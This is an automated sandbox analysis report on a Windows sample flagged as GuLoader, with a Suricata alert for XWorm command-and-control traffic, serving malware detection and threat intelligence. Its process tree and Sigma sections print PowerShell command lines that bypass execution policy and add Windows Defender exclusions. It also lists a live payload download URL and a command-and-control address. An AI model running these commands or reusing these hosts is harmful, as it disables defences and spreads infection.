Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
yVVZdG2NJX.exe

Overview

General Information

Sample name:yVVZdG2NJX.exe
renamed because original name is a hash value
Original sample name:18ea5087eb82e075ca35d2b2dcff9450.exe
Analysis ID:1561885
MD5:18ea5087eb82e075ca35d2b2dcff9450
SHA1:dc436fbaa777672d44a8b90b98c4a1c266885845
SHA256:a7247c64cc0168290ca3b210e59ef629b46f513205bc6562ec79cdd2cda71725
Tags:exeuser-abuse_ch
Infos:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • yVVZdG2NJX.exe (PID: 8068 cmdline: "C:\Users\user\Desktop\yVVZdG2NJX.exe" MD5: 18EA5087EB82E075CA35D2B2DCFF9450)
    • yVVZdG2NJX.exe (PID: 7796 cmdline: "C:\Users\user\Desktop\yVVZdG2NJX.exe" MD5: 18EA5087EB82E075CA35D2B2DCFF9450)
      • powershell.exe (PID: 5900 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\yVVZdG2NJX.exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 6512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1708 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'yVVZdG2NJX.exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 8188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 656 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\yVVZdG2NJX.exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 2224 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.1554696495.00000000008BA000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_GuLoader_3Yara detected GuLoaderJoe Security
    00000000.00000002.1555288349.0000000004473000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      Process Memory Space: yVVZdG2NJX.exe PID: 8068JoeSecurity_GuLoader_3Yara detected GuLoaderJoe Security

        Sigma Signatures

        System Summary

        barindex
        Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\yVVZdG2NJX.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\yVVZdG2NJX.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\yVVZdG2NJX.exe", ParentImage: C:\Users\user\Desktop\yVVZdG2NJX.exe, ParentProcessId: 7796, ParentProcessName: yVVZdG2NJX.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\yVVZdG2NJX.exe', ProcessId: 5900, ProcessName: powershell.exe
        Sigma detected: Change PowerShell Policies to an Insecure Level
        Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\yVVZdG2NJX.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\yVVZdG2NJX.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\yVVZdG2NJX.exe", ParentImage: C:\Users\user\Desktop\yVVZdG2NJX.exe, ParentProcessId: 7796, ParentProcessName: yVVZdG2NJX.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\yVVZdG2NJX.exe', ProcessId: 5900, ProcessName: powershell.exe
        Sigma detected: Powershell Defender Exclusion
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\yVVZdG2NJX.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\yVVZdG2NJX.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\yVVZdG2NJX.exe", ParentImage: C:\Users\user\Desktop\yVVZdG2NJX.exe, ParentProcessId: 7796, ParentProcessName: yVVZdG2NJX.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\yVVZdG2NJX.exe', ProcessId: 5900, ProcessName: powershell.exe
        Sigma detected: Startup Folder File Write
        Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\yVVZdG2NJX.exe, ProcessId: 7796, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\yVVZdG2NJX.lnk
        Sigma detected: Non Interactive PowerShell Process Spawned
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\yVVZdG2NJX.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\yVVZdG2NJX.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\yVVZdG2NJX.exe", ParentImage: C:\Users\user\Desktop\yVVZdG2NJX.exe, ParentProcessId: 7796, ParentProcessName: yVVZdG2NJX.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\yVVZdG2NJX.exe', ProcessId: 5900, ProcessName: powershell.exe

        Suricata Signatures

        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-11-24T16:37:41.543353+010028032702Potentially Bad Traffic192.168.2.1049776185.244.144.6880TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-11-24T16:38:12.671473+010028559241Malware Command and Control Activity Detected192.168.2.104982187.121.86.84020TCP

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Multi AV Scanner detection for dropped file
        Source: C:\Users\user\AppData\Roaming\yVVZdG2NJX.exeReversingLabs: Detection: 42%
        Multi AV Scanner detection for submitted file
        Source: yVVZdG2NJX.exeReversingLabs: Detection: 42%
        AI detected suspicious sample
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
        Machine Learning detection for dropped file
        Source: C:\Users\user\AppData\Roaming\yVVZdG2NJX.exeJoe Sandbox ML: detected
        Machine Learning detection for sample
        Source: yVVZdG2NJX.exeJoe Sandbox ML: detected
        Source: yVVZdG2NJX.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: yVVZdG2NJX.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeCode function: 0_2_004065DA FindFirstFileW,FindClose,0_2_004065DA
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeCode function: 0_2_004059A9 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004059A9
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeCode function: 3_2_00402868 FindFirstFileW,3_2_00402868
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeCode function: 3_2_004065DA FindFirstFileW,FindClose,3_2_004065DA
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeCode function: 3_2_004059A9 DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,3_2_004059A9

        Networking

        barindex
        Suricata IDS alerts for network traffic
        Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.10:49821 -> 87.121.86.8:4020
        Source: global trafficTCP traffic: 192.168.2.10:49821 -> 87.121.86.8:4020
        Source: Joe Sandbox ViewIP Address: 185.244.144.68 185.244.144.68
        Source: Joe Sandbox ViewASN Name: SKATTV-ASBG SKATTV-ASBG
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.10:49776 -> 185.244.144.68:80
        Source: global trafficHTTP traffic detected: GET /SJatcRCUnkMIpuGcrVu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: mertvinc.com.trCache-Control: no-cache
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.86.8
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.86.8
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.86.8
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.86.8
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.86.8
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.86.8
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.86.8
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.86.8
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.86.8
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.86.8
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.86.8
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.86.8
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.86.8
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.86.8
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.86.8
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.86.8
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.86.8
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.86.8
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.86.8
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /SJatcRCUnkMIpuGcrVu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: mertvinc.com.trCache-Control: no-cache
        Source: global trafficDNS traffic detected: DNS query: mertvinc.com.tr
        Source: powershell.exe, 0000000A.00000002.1823896104.00000000077D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
        Source: powershell.exe, 00000005.00000002.1748126062.0000000008205000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1833557916.0000000008756000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
        Source: powershell.exe, 00000005.00000002.1745481577.00000000072F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microv
        Source: yVVZdG2NJX.exe, 00000003.00000002.2589172205.0000000004248000.00000004.00000020.00020000.00000000.sdmp, yVVZdG2NJX.exe, 00000003.00000002.2589611092.0000000005C70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://mertvinc.com.tr/SJatcRCUnkMIpuGcrVu155.bin
        Source: yVVZdG2NJX.exe, yVVZdG2NJX.exe.3.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: powershell.exe, 00000005.00000002.1743227140.00000000059A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1778393165.0000000006048000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1818382211.0000000005BF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
        Source: powershell.exe, 0000000A.00000002.1806582406.0000000004CE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: powershell.exe, 00000005.00000002.1740597554.0000000004A96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1769636888.0000000005136000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1806582406.0000000004CE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
        Source: yVVZdG2NJX.exe, 00000003.00000002.2609686663.00000000345A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1740597554.0000000004941000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1769636888.0000000004FE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1806582406.0000000004B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: powershell.exe, 00000005.00000002.1740597554.0000000004A96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1769636888.0000000005136000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1806582406.0000000004CE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
        Source: powershell.exe, 0000000A.00000002.1806582406.0000000004CE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: powershell.exe, 00000008.00000002.1785903689.0000000008A97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
        Source: powershell.exe, 00000005.00000002.1740597554.0000000004941000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1769636888.0000000004FE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1806582406.0000000004B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
        Source: powershell.exe, 0000000A.00000002.1818382211.0000000005BF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
        Source: powershell.exe, 0000000A.00000002.1818382211.0000000005BF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 0000000A.00000002.1818382211.0000000005BF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
        Source: powershell.exe, 0000000A.00000002.1806582406.0000000004CE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
        Source: powershell.exe, 0000000A.00000002.1806582406.00000000054B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1806582406.00000000052F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
        Source: powershell.exe, 00000005.00000002.1743227140.00000000059A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1778393165.0000000006048000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1818382211.0000000005BF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeCode function: 0_2_0040543E GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageW,CreatePopupMenu,LdrInitializeThunk,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040543E
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeCode function: 0_2_0040336C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040336C
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeFile created: C:\Windows\resources\0809Jump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeCode function: 0_2_00404C7B0_2_00404C7B
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeCode function: 0_2_703D1B630_2_703D1B63
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeCode function: 3_2_00404C7B3_2_00404C7B
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeCode function: 3_2_001548983_2_00154898
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeCode function: 3_2_001513003_2_00151300
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeCode function: 3_2_001518803_2_00151880
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeCode function: 3_2_0015F9183_2_0015F918
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeCode function: 3_2_36914A903_2_36914A90
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeCode function: 3_2_36912BA03_2_36912BA0
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeCode function: 3_2_369131C83_2_369131C8
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeCode function: 3_2_3789F7203_2_3789F720
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeCode function: 3_2_3789BEA03_2_3789BEA0
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeCode function: 3_2_37893A843_2_37893A84
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeCode function: 3_2_3789F3D83_2_3789F3D8
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeCode function: 3_2_37896C303_2_37896C30
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeCode function: 3_2_37891B243_2_37891B24
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeCode function: 3_2_37892AD03_2_37892AD0
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeCode function: 3_2_37894A483_2_37894A48
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_02D9B4905_2_02D9B490
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07400CE85_2_07400CE8
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_074004885_2_07400488
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0352B4908_2_0352B490
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_035213448_2_03521344
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_035212E08_2_035212E0
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0352C6628_2_0352C662
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0352B4708_2_0352B470
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_04A8B49010_2_04A8B490
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeCode function: String function: 00402C41 appears 49 times
        Source: yVVZdG2NJX.exe, 00000003.00000002.2612931315.0000000036CE9000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs yVVZdG2NJX.exe
        Source: yVVZdG2NJX.exe, 00000003.00000002.2589172205.000000000428A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs yVVZdG2NJX.exe
        Source: yVVZdG2NJX.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: classification engineClassification label: mal100.troj.evad.winEXE@12/21@1/2
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeCode function: 0_2_0040336C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040336C
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeCode function: 0_2_004046FF GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,LdrInitializeThunk,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004046FF
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeCode function: 0_2_00402104 LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,0_2_00402104
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberryJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeMutant created: \Sessions\1\BaseNamedObjects\ssjpS2lhbkGsnEgT
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2224:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6512:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8188:120:WilError_03
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeFile created: C:\Users\user\AppData\Local\Temp\nsa8F08.tmpJump to behavior
        Source: yVVZdG2NJX.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: yVVZdG2NJX.exeReversingLabs: Detection: 42%
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeFile read: C:\Users\user\Desktop\yVVZdG2NJX.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\yVVZdG2NJX.exe "C:\Users\user\Desktop\yVVZdG2NJX.exe"
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess created: C:\Users\user\Desktop\yVVZdG2NJX.exe "C:\Users\user\Desktop\yVVZdG2NJX.exe"
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\yVVZdG2NJX.exe'
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'yVVZdG2NJX.exe'
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\yVVZdG2NJX.exe'
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess created: C:\Users\user\Desktop\yVVZdG2NJX.exe "C:\Users\user\Desktop\yVVZdG2NJX.exe"Jump to behavior
